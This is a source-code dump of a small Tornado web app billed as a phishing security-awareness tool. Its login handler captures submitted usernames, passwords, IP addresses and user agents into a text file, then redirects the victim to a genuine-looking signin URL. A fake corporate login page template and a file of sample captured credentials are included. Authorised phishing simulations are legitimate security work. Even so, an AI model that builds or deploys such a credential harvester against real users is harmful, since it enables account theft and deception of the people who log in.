├── .DS_Store ├── README.md ├── application.py ├── application.pyc ├── fish.txt ├── handlers ├── __init__.py ├── __init__.pyc ├── login.py └── login.pyc ├── logs ├── .DS_Store └── app.log ├── server.py ├── templates ├── .DS_Store └── index.html ├── url.py └── url.pyc /.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p1r06u3/phishing/5d334f91a00cd9b9a5c47f0a9db89306984d5700/.DS_Store -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## The Security Practices of Party A Phishing 2 | 3 | Introduce: https://pirogue.org/2018/06/26/phishing 4 | 5 | -------------------------------------------------------------------------------- /application.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding:utf-8 3 | """ 4 | Author: pirogue -- 5 | Purpose: 应用配置文件 6 | Created: 2017/4/8 7 | Site: http://pirogue.org 8 | """ 9 | 10 | 11 | import os 12 | import logging 13 | 14 | 15 | settings = dict( 16 | # 设置Debug开关 17 | debug = True, 18 | # 设置templates路径 19 | template_path = os.path.join(os.path.dirname(__file__), "templates"), 20 | # 设置静态文件解析路径 21 | # static_path = os.path.join(os.path.dirname(__file__), "assets"), 22 | # 设置cookie密钥 23 | cookie_secret = "1234567890qwertyuiopasdnghjklzxcvbnm1234567890qwrtyu", 24 | login_url = "/login", 25 | ) 26 | 27 | 28 | # web日志配置 29 | logfile = os.path.join(os.path.dirname(__file__), "logs", "app.log") 30 | handler = logging.FileHandler(logfile) 31 | logger = logging.getLogger() 32 | 33 | logger.addHandler(handler) 34 | logger.setLevel(logging.NOTSET) 35 | 36 | -------------------------------------------------------------------------------- /application.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p1r06u3/phishing/5d334f91a00cd9b9a5c47f0a9db89306984d5700/application.pyc -------------------------------------------------------------------------------- /fish.txt: -------------------------------------------------------------------------------- 1 | email:[u'admin']|password:[u'admin888']email:[u'']|password:[u'admin']email:[u'']|password:[u'admin'] -------------------------------------------------------------------------------- /handlers/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p1r06u3/phishing/5d334f91a00cd9b9a5c47f0a9db89306984d5700/handlers/__init__.py -------------------------------------------------------------------------------- /handlers/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p1r06u3/phishing/5d334f91a00cd9b9a5c47f0a9db89306984d5700/handlers/__init__.pyc -------------------------------------------------------------------------------- /handlers/login.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding:utf-8 3 | """ 4 | Author: pirogue -- 5 | Purpose: 6 | Created: 2017/4/8 7 | Site: http://pirogue.org 8 | """ 9 | 10 | 11 | import tornado.web 12 | import json 13 | 14 | ######################################################################## 15 | class BaseHandler(tornado.web.RequestHandler): 16 | """ 基础类 """ 17 | 18 | #---------------------------------------------------------------------- 19 | def post(self): 20 | """ 钓鱼获取post数据 """ 21 | username = self.get_arguments('username') 22 | passowrd = self.get_arguments('password') 23 | userAgent = self.request.headers['user-agent'] #获取UA 24 | ip = self.request.remote_ip #获取IP 25 | with open('fish.txt', 'a') as f: 26 | f.write('username:'+ str(username) + ',' + 'password:' + str(passowrd) + ',' + 'post_time:' + time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) + ',' + 'userAgent:' + str(userAgent) +','+ 'IP:' + str(ip)) 27 | f.write('\n') 28 | print('username:'+ str(username) + ',' + 'password:' + str(passowrd) + ',' + 'post_time:' + time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) + ',' + 'userAgent:' + str(userAgent) +','+ 'IP:' + str(ip)) 29 | return self.redirect('https://abc.com/signin.html') 30 | 31 | def get(self): 32 | '''记录访问时间和UA''' 33 | userAgent = self.request.headers['user-agent'] #获取UA 34 | ip = self.request.remote_ip #获取IP 35 | with open('visit.txt', 'a') as f: 36 | f.write('visit_time:' + time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) + ',' + 'userAgent:' + str(userAgent) +','+ 'IP:' + str(ip)) 37 | f.write('\n') 38 | print('visit_time:' + time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) + ',' + 'userAgent:' + str(userAgent) +','+ 'IP:' + str(ip)) 39 | return self.render('index.html') 40 | 41 | if __name__ == '__main__': 42 | unittest.main() 43 | -------------------------------------------------------------------------------- /handlers/login.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p1r06u3/phishing/5d334f91a00cd9b9a5c47f0a9db89306984d5700/handlers/login.pyc -------------------------------------------------------------------------------- /logs/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p1r06u3/phishing/5d334f91a00cd9b9a5c47f0a9db89306984d5700/logs/.DS_Store -------------------------------------------------------------------------------- /logs/app.log: -------------------------------------------------------------------------------- 1 | 200 GET / (127.0.0.1) 4.98ms 2 | 404 GET /site/spot?spot={%22version%22:%221.1%22,%22click_id%22:%22%E8%BF%9B%E5%85%A5%22,%22parent_click_id%22:%22-%22,%22module%22:%22-%22,%22current_imp_id%22:%22%E7%99%BB%E5%BD%95%E9%A1%B5%E9%9D%A2%22,%22user_id%22:%22-%22,%22session_id%22:%22-%22,%22utm_medium%22:%22-%22,%22utm_sys_version%22:%22-%22,%22app_version%22:%22-%22,%22utm_source%22:%22-%22,%22object_id%22:%22%22,%22val%22:%22-%22,%22status%22:0,%22title%22:%22-%22,%22result%22:%22-%22,%22referer%22:%22-%22,%22ref%22:%22-%22,%22request_url%22:%22/%22,%22uuid%22:%22%22,%22resolution%22:%221440*900%22,%22userAgent%22:%22Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_13_5)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/67.0.3396.87%20Safari/537.36%22,%22time%22:1530004069270,%22start_time%22:1530004069017} (127.0.0.1) 1.09ms 3 | 200 GET / (127.0.0.1) 2.40ms 4 | 404 GET /site/spot?spot={%22version%22:%221.1%22,%22click_id%22:%22%E8%BF%9B%E5%85%A5%22,%22parent_click_id%22:%22-%22,%22module%22:%22-%22,%22current_imp_id%22:%22%E7%99%BB%E5%BD%95%E9%A1%B5%E9%9D%A2%22,%22user_id%22:%22-%22,%22session_id%22:%22-%22,%22utm_medium%22:%22-%22,%22utm_sys_version%22:%22-%22,%22app_version%22:%22-%22,%22utm_source%22:%22-%22,%22object_id%22:%22%22,%22val%22:%22-%22,%22status%22:0,%22title%22:%22-%22,%22result%22:%22-%22,%22referer%22:%22-%22,%22ref%22:%22-%22,%22request_url%22:%22/%22,%22uuid%22:%2257b81785e8dc69caa72a805898a04a10%22,%22resolution%22:%221440*900%22,%22userAgent%22:%22Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_13_5)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/67.0.3396.87%20Safari/537.36%22,%22time%22:1530004134953,%22start_time%22:1530004134907} (127.0.0.1) 2.54ms 5 | 404 GET /favicon.ico (127.0.0.1) 0.45ms 6 | 302 POST / (127.0.0.1) 1.63ms 7 | 200 GET / (127.0.0.1) 1.89ms 8 | 404 GET /site/spot?spot={%22version%22:%221.1%22,%22click_id%22:%22%E8%BF%9B%E5%85%A5%22,%22parent_click_id%22:%22-%22,%22module%22:%22-%22,%22current_imp_id%22:%22%E7%99%BB%E5%BD%95%E9%A1%B5%E9%9D%A2%22,%22user_id%22:%22-%22,%22session_id%22:%22-%22,%22utm_medium%22:%22-%22,%22utm_sys_version%22:%22-%22,%22app_version%22:%22-%22,%22utm_source%22:%22-%22,%22object_id%22:%22%22,%22val%22:%22-%22,%22status%22:0,%22title%22:%22-%22,%22result%22:%22-%22,%22referer%22:%22-%22,%22ref%22:%22-%22,%22request_url%22:%22/%22,%22uuid%22:%2257b81785e8dc69caa72a805898a04a10%22,%22resolution%22:%221440*900%22,%22userAgent%22:%22Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_13_5)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/67.0.3396.87%20Safari/537.36%22,%22time%22:1530004146412,%22start_time%22:1530004146239} (127.0.0.1) 0.96ms 9 | 404 GET /site/spot?spot={%22version%22:%221.1%22,%22click_id%22:%22%E8%BF%9B%E5%85%A5%22,%22parent_click_id%22:%22-%22,%22module%22:%22-%22,%22current_imp_id%22:%22%E7%99%BB%E5%BD%95%E9%A1%B5%E9%9D%A2%22,%22user_id%22:%22-%22,%22session_id%22:%22-%22,%22utm_medium%22:%22-%22,%22utm_sys_version%22:%22-%22,%22app_version%22:%22-%22,%22utm_source%22:%22-%22,%22object_id%22:%22%22,%22val%22:%22-%22,%22status%22:0,%22title%22:%22-%22,%22result%22:%22-%22,%22referer%22:%22-%22,%22ref%22:%22-%22,%22request_url%22:%22/%22,%22uuid%22:%2257b81785e8dc69caa72a805898a04a10%22,%22resolution%22:%221440*900%22,%22userAgent%22:%22Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_13_5)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/67.0.3396.87%20Safari/537.36%22,%22time%22:1530004392328,%22start_time%22:1530004392151} (127.0.0.1) 0.68ms 10 | 200 GET / (127.0.0.1) 4.61ms 11 | 302 POST / (127.0.0.1) 2.52ms 12 | 200 GET / (127.0.0.1) 2.04ms 13 | 200 GET / (127.0.0.1) 2.17ms 14 | -------------------------------------------------------------------------------- /server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding:utf-8 3 | """ 4 | Author: pirogue -- 5 | Purpose: 钓鱼页面 6 | Created: 2017年8月15日19:22:49 7 | Site: http://pirogue.org 8 | """ 9 | 10 | 11 | import tornado.httpserver 12 | import tornado.ioloop 13 | import tornado.web 14 | import tornado.autoreload 15 | 16 | from application import settings 17 | from url import url 18 | 19 | 20 | from tornado.options import define, options 21 | define("port", default=1234, help="run on the given port", type=int) 22 | 23 | 24 | if __name__ == '__main__': 25 | tornado.options.parse_command_line() 26 | app = tornado.web.Application(handlers=url, **settings) 27 | http_server = tornado.httpserver.HTTPServer(app) 28 | http_server.listen(options.port) 29 | print('Development server is running at http://127.0.0.1:%s/' % options.port) 30 | tornado.ioloop.IOLoop.instance().start() -------------------------------------------------------------------------------- /templates/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p1r06u3/phishing/5d334f91a00cd9b9a5c47f0a9db89306984d5700/templates/.DS_Store -------------------------------------------------------------------------------- /templates/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 大哥统一登录 10 | 11 | 12 | 13 | 124 | 193 | 194 | 195 |
196 | 245 |
246 | 客户第一 247 | 团结合作 248 | 拥抱变化 249 | 诚信 250 | 坚定 251 | 敬业 252 |
253 |
254 | 274 | 275 | 276 | -------------------------------------------------------------------------------- /url.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding:utf-8 3 | """ 4 | Author: pirogue -- 5 | Purpose: URL路由配置文件 6 | Created: 2017/4/8 7 | Site: http://pirogue.org 8 | """ 9 | 10 | from handlers import login 11 | 12 | 13 | 14 | url = [ 15 | # LoginHandler url 16 | # (r"/login", login.LoginHandler), 17 | (r"/", login.BaseHandler), 18 | # (r"/logout", login.LogoutHandler), 19 | ] 20 | 21 | 22 | 23 | if __name__ == '__main__': 24 | unittest.main() -------------------------------------------------------------------------------- /url.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p1r06u3/phishing/5d334f91a00cd9b9a5c47f0a9db89306984d5700/url.pyc --------------------------------------------------------------------------------